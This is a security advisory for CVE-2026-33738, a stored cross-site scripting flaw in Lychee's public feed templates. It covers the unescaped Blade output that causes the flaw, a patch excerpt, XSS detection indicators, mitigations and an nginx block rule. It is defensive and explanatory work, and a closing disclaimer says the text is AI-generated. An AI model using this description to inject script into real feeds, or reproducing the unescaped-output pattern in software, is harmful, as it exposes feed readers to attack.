CVE-2026-33738 Overview
CVE-2026-33738 is a stored Cross-Site Scripting (XSS) vulnerability affecting Lychee, a free, open-source photo-management tool. The vulnerability exists because the photo description field is stored without HTML sanitization and rendered using Blade unescaped output ({!! $item->summary !!}) in the RSS, Atom, and JSON feed templates. The /feed endpoint is publicly accessible without authentication, allowing any RSS reader to execute attacker-controlled JavaScript when processing malicious feed content.
Critical Impact
Authenticated users can inject malicious JavaScript through photo descriptions, which executes in the context of any RSS reader accessing the public /feed endpoint without authentication.
Affected Products
- Lychee versions prior to 7.5.3
Discovery Timeline
- 2026-03-26 - CVE-2026-33738 published to NVD
- 2026-03-26 - Last updated in NVD database
Technical Details for CVE-2026-33738
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting. The flaw stems from improper output encoding in Lychee's feed generation functionality. When photo descriptions containing malicious scripts are processed, the application uses Blade's unescaped output syntax to render the content directly into RSS, Atom, and JSON feeds without sanitization.
The attack requires low privileges (authenticated user access to upload photos with descriptions) but can impact a broader audience since the /feed endpoint is publicly accessible. This creates a scenario where an authenticated attacker can persist malicious JavaScript that executes when any unauthenticated user or RSS aggregator accesses the feed.
Root Cause
The root cause is the use of Blade's unsafe rendering directive {!! !!} instead of the escaped {{ }} syntax when outputting user-controlled content in feed templates. The $item->summary variable containing photo descriptions is rendered without any HTML entity encoding or sanitization, allowing raw HTML and JavaScript to be injected directly into the feed output.
Attack Vector
An attacker with authenticated access to the Lychee application can upload a photo with a malicious JavaScript payload embedded in the description field. When this content is rendered in the public RSS, Atom, or JSON feeds, the script executes in the context of any application parsing the feed, such as RSS reader applications or aggregator services.
The attack vector is network-based, requiring authenticated access to inject the payload but no authentication to trigger the vulnerability through feed consumption.
// Security patch - Adding Markdown facade for proper output sanitization
// Source: https://github.com/LycheeOrg/Lychee/commit/d2e2606a0223d5a384d5b806db1b31eb587adc5c
use App\Services\UrlGenerator;
use Carbon\Exceptions\InvalidFormatException;
use Carbon\Exceptions\UnitException;
+use GrahamCampbell\Markdown\Facades\Markdown;
use Illuminate\Contracts\Container\BindingResolutionException;
use Illuminate\Support\Carbon;
use Illuminate\Support\Collection;
The fix introduces the GrahamCampbell Markdown facade to properly sanitize user-controlled content before rendering in feed templates, replacing the unsafe unescaped output with properly sanitized Markdown rendering.
Detection Methods for CVE-2026-33738
Indicators of Compromise
- Photo descriptions containing HTML script tags, event handlers (e.g., onerror, onload), or JavaScript protocol handlers
- Unusual JavaScript payloads in RSS/Atom/JSON feed content from the /feed endpoint
- Web server logs showing suspicious payloads in POST requests to photo upload or description update endpoints
Detection Strategies
- Monitor application logs for photo descriptions containing <script>, javascript:, or HTML event handlers
- Implement Web Application Firewall (WAF) rules to detect XSS payloads in form submissions to the Lychee application
- Review feed output for unexpected HTML or script content that should not be present in properly sanitized feeds
Monitoring Recommendations
- Enable logging for all photo description updates and monitor for HTML/JavaScript content
- Configure alerts for feed requests that result in responses containing suspicious script patterns
- Audit existing photo descriptions in the database for potential pre-existing malicious content
How to Mitigate CVE-2026-33738
Immediate Actions Required
- Upgrade Lychee to version 7.5.3 or later immediately
- Review existing photo descriptions in the database for malicious script content and sanitize as needed
- If immediate upgrade is not possible, consider temporarily disabling the /feed endpoint
Patch Information
The vulnerability is addressed in Lychee version 7.5.3. The fix implements proper output sanitization using the GrahamCampbell Markdown facade to process user-controlled content before rendering in feed templates. For detailed information, see the GitHub Security Advisory GHSA-5574, the fix commit, and the v7.5.3 release notes.
Workarounds
- Disable or restrict access to the /feed endpoint at the web server level until the patch can be applied
- Implement input validation on photo descriptions to strip HTML and JavaScript content
- Use a reverse proxy or WAF to filter potentially malicious content from feed responses
# Example: Block access to /feed endpoint in nginx until patch is applied
location /feed {
deny all;
return 403;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
